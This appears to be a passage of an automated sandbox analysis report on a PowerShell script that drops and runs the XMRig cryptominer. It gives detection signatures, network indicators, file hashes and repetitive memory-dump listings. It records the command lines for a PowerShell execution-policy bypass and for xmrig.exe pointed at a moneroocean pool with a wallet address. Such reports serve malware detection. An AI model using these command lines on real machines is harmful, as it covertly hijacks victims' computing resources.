memory/184-90-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-91-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-92-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-93-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-94-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-95-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-96-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-97-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-98-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-99-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-100-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-101-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-102-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-103-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-104-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-105-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-106-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-107-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-108-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-109-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-110-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-111-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-112-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-113-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-114-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-115-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-116-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-117-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-118-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:21
Platform
win11-20240508-en
Max time kernel
1800s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4292 wrote to memory of 3580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4292 wrote to memory of 3580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4292-0-0x00007FFE6C7F3000-0x00007FFE6C7F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfxqswyg.z3p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4292-6-0x0000012468540000-0x0000012468562000-memory.dmp
memory/4292-10-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/4292-11-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/4292-12-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/4292-14-0x0000012468CB0000-0x0000012468CC2000-memory.dmp
memory/4292-15-0x0000012468570000-0x000001246857A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3580-46-0x0000026E1AA40000-0x0000026E1AA60000-memory.dmp
memory/3580-47-0x0000026E1C340000-0x0000026E1C360000-memory.dmp
memory/3580-48-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-51-0x0000026E1C380000-0x0000026E1C3A0000-memory.dmp
memory/4292-49-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/3580-50-0x0000026E1C360000-0x0000026E1C380000-memory.dmp
memory/4292-53-0x00007FFE6C7F3000-0x00007FFE6C7F5000-memory.dmp
memory/3580-52-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-54-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-55-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-57-0x0000026E1C380000-0x0000026E1C3A0000-memory.dmp
memory/3580-56-0x0000026E1C360000-0x0000026E1C380000-memory.dmp
memory/3580-58-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-59-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-60-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-61-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-62-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-63-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-64-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-65-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-66-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-67-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-68-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-69-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-70-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-71-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-72-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-73-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-74-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-75-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-76-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-77-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-78-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-79-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-80-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-81-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-82-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-83-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-84-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-85-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-86-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-87-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-88-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-89-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-90-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-91-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-92-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-93-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-94-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-95-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-96-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-97-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-98-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-99-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-100-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-101-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-102-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-103-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-104-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-105-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-106-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-107-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-108-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-109-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-110-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-111-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-112-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-113-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-114-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-115-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-116-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240611-en
Max time kernel
1798s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1504 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1504 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| GB | 184.28.176.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 99.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.239.69.13.in-addr.arpa | udp |
Files
memory/1504-0-0x00007FFDA9783000-0x00007FFDA9785000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2k0pbn0y.nh0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1504-7-0x000001D5ECE00000-0x000001D5ECE22000-memory.dmp
memory/1504-11-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/1504-12-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/1504-14-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/1504-15-0x000001D5ED1E0000-0x000001D5ED1F2000-memory.dmp
memory/1504-16-0x000001D5ECF80000-0x000001D5ECF8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/332-47-0x000002C530150000-0x000002C530170000-memory.dmp
memory/332-48-0x000002C531940000-0x000002C531960000-memory.dmp
memory/332-49-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-50-0x000002C531960000-0x000002C531980000-memory.dmp
memory/332-51-0x000002C531980000-0x000002C5319A0000-memory.dmp
memory/332-52-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/1504-53-0x00007FFDA9783000-0x00007FFDA9785000-memory.dmp
memory/1504-54-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/332-55-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/1504-56-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/332-59-0x000002C531980000-0x000002C5319A0000-memory.dmp
memory/332-58-0x000002C531960000-0x000002C531980000-memory.dmp
memory/332-57-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-60-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-61-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-62-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-63-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-64-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-65-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-66-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-67-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-68-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-69-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-70-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-71-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-72-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-73-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-74-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-75-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-76-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-77-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-78-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-79-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-80-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-81-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-82-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-83-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-84-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-85-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-86-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-87-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-88-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-89-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-90-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-91-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-92-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-93-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-94-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-95-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-96-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-97-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-98-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-99-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-100-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-101-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-102-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-103-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-104-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-105-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-106-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-107-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-108-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-109-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-110-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-111-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-112-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-113-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-114-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-115-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-116-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-117-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-118-0x00007FF711A50000-0x00007FF712683000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:48
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
